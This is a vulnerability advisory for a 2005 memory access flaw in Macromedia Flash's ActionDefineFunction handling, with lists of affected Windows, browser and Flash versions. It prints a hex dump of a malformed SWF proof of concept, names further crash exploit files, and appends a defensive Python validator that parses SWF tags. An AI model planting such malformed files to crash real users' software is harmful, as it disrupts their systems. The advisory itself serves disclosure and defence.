
Title Macromedia Flash ActionDefineFunction Memory Access Vulnerability
Published 2005-11-07-12:00AM
Updated 2005-11-10-02:53PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Discovered by Sec Consult.
Vulnerable  Microsoft Windows XP Professional x64 Edition
Microsoft Windows XP Professional SP2
Microsoft Windows XP Professional SP1
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows XP Home SP2
Microsoft Windows XP Home SP1
Microsoft Windows ME
Microsoft Windows 98SE
Microsoft Windows 98
Macromedia Flash 7.0.19.0
Macromedia Flash 7.0 r19
Macromedia Flash 6.0.79.0
Macromedia Flash 6.0.65.0
Macromedia Flash 6.0.47.0
Macromedia Flash 6.0.40.0
Macromedia Flash 6.0.29.0
Macromedia Flash 6.0
Microsoft Internet Explorer 5.0
Microsoft Internet Explorer 5.0.1
Microsoft Internet Explorer 5.0.1 SP1
Microsoft Internet Explorer 5.0.1 SP2
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 5.5 preview
Microsoft Internet Explorer 5.5 SP1
Microsoft Internet Explorer 5.5 SP2
Microsoft Internet Explorer 6.0
Netscape Communicator 4.6
Netscape Communicator 4.7
Netscape Communicator 4.51
Netscape Communicator 4.61
Netscape Communicator 4.72
Netscape Communicator 4.73
Netscape Communicator 4.74
Netscape Communicator 4.75
Netscape Communicator 4.76
Netscape Communicator 4.77
Netscape Communicator 4.78
Netscape Communicator 6.1
Not Vulnerable  
Code   The following proof of concept is available:

<swf>

----- [SetBackgroundColor] -----
TagID: 9 (size: 3 (short tag)
- dump ->:
\x43\x02\xff\x00\x00

----- [DoAction] -----
TagID: 12 (size: 60 (short tag)
- dump ->:
\x3c\x03\x9b\x08\x00\x41\x41\x41\x41\x41\x41\x41\x41\x00\x40\x00
\x42\x42\x42\x42\x42\x42\x42\x42\x00\x43\x43\x43\x43\x43\x43\x43
\x43\x00\x44\x44\x44\x44\x44\x44\x44\x44\x00\x45\x45\x45\x45\x45
\x45\x45\x45\x00\x46\x46\x46\x46\x46\x46\x46\x46\x00\x00

----- [ShowFrame] -----
TagID: 1 (size: 0 (short tag)
- dump ->:
\x40\x00

----- [End] -----
TagID: 0 (size: 0 (short tag)
- dump ->:
\x00\x00

</swf>
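
As an added example (not part of the original advisory or of either referenced proof of concept), the following Python code walks the tag dump above and checks that every ActionDefineFunction record (action code 0x9b) is structurally complete within its declared length. The record layout (FunctionName, NumParams, parameter names, CodeSize) is taken from the SWF file format as an assumption, and all function and constant names are hypothetical.

```python
TAG_DO_ACTION, ACTION_DEFINE_FUNCTION = 12, 0x9B
PAGE_TAGS = bytes.fromhex(  # bytes of the four tag dumps shown on this page
    "4302ff0000 3c039b08004141414141414141004000 42424242424242420043434343434343"
    "43004444444444444444004545454545 4545450046464646464646460000 4000 0000")
WELL_FORMED = bytes.fromhex("0a039b0600660000000000000000")  # constructed: f(), no params

def u16(buf, pos):  # little-endian 16-bit read; a short read yields a smaller value
    return int.from_bytes(buf[pos:pos + 2], "little")

def iter_tags(data):
    """Yield (code, body) per tag; the 16-bit header holds code:10, length:6."""
    pos = 0
    while pos + 2 <= len(data):
        code, length, pos = u16(data, pos) >> 6, u16(data, pos) & 0x3F, pos + 2
        if length == 0x3F:  # long tag: a 32-bit length follows the header
            length, pos = int.from_bytes(data[pos:pos + 4], "little"), pos + 4
        if pos + length > len(data):
            raise ValueError(f"tag {code} overruns the stream")
        yield code, data[pos:pos + length]
        pos += length

def check_define_function(rec):
    """Return why a DefineFunction record is incomplete, or None if it parses."""
    end = rec.find(b"\x00")  # FunctionName must terminate inside the record
    if end < 0:
        return "function name not NUL-terminated within declared length"
    nparams, pos = u16(rec, end + 1), end + 3
    for _ in range(nparams):  # each parameter name is a NUL-terminated string
        end = rec.find(b"\x00", pos)
        if end < 0:
            return "parameter names run past declared length"
        pos = end + 1
    return None if pos + 2 == len(rec) else "CodeSize field missing or misplaced"

def scan(data):
    """Collect findings for every ActionDefineFunction record in DoAction tags."""
    findings = []
    for code, body in iter_tags(data):
        pos = 0
        while code == TAG_DO_ACTION and pos < len(body) and body[pos] != 0:
            action, length, pos = body[pos], 0, pos + 1
            if action >= 0x80:  # these actions carry a 16-bit length field
                length, pos = u16(body, pos), pos + 2
            rec = body[pos:pos + length]
            why = check_define_function(rec) if action == ACTION_DEFINE_FUNCTION else None
            if len(rec) < length or why:
                findings.append(why or f"action 0x{action:02x} overruns its tag")
            pos += length
    return findings
```

`scan(PAGE_TAGS)` reports that the function name is not NUL-terminated within the record's declared length of 8, while the constructed `WELL_FORMED` sample produces no findings.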

The following proof of concept (df.swf) provided by Karma <karma@DesignFolks.com.au> will determine if a vulnerable Flash Player is installed. If the Flash Player is vulnerable, opening the file will crash the browser. Otherwise a yellow image will be displayed.

The 'flash_dos_poc.c' proof of concept exploit by BassReFLeX creates a SWF file sufficient to exploit this issue to crash a vulnerable Flash Player.

/data/vulnerabilities/exploits/df.swf
/data/vulnerabilities/exploits/flash_dos_poc.c
Copyright 2007, SecurityDot
Thu, 17 Dec 2009 22:33:24 +0000
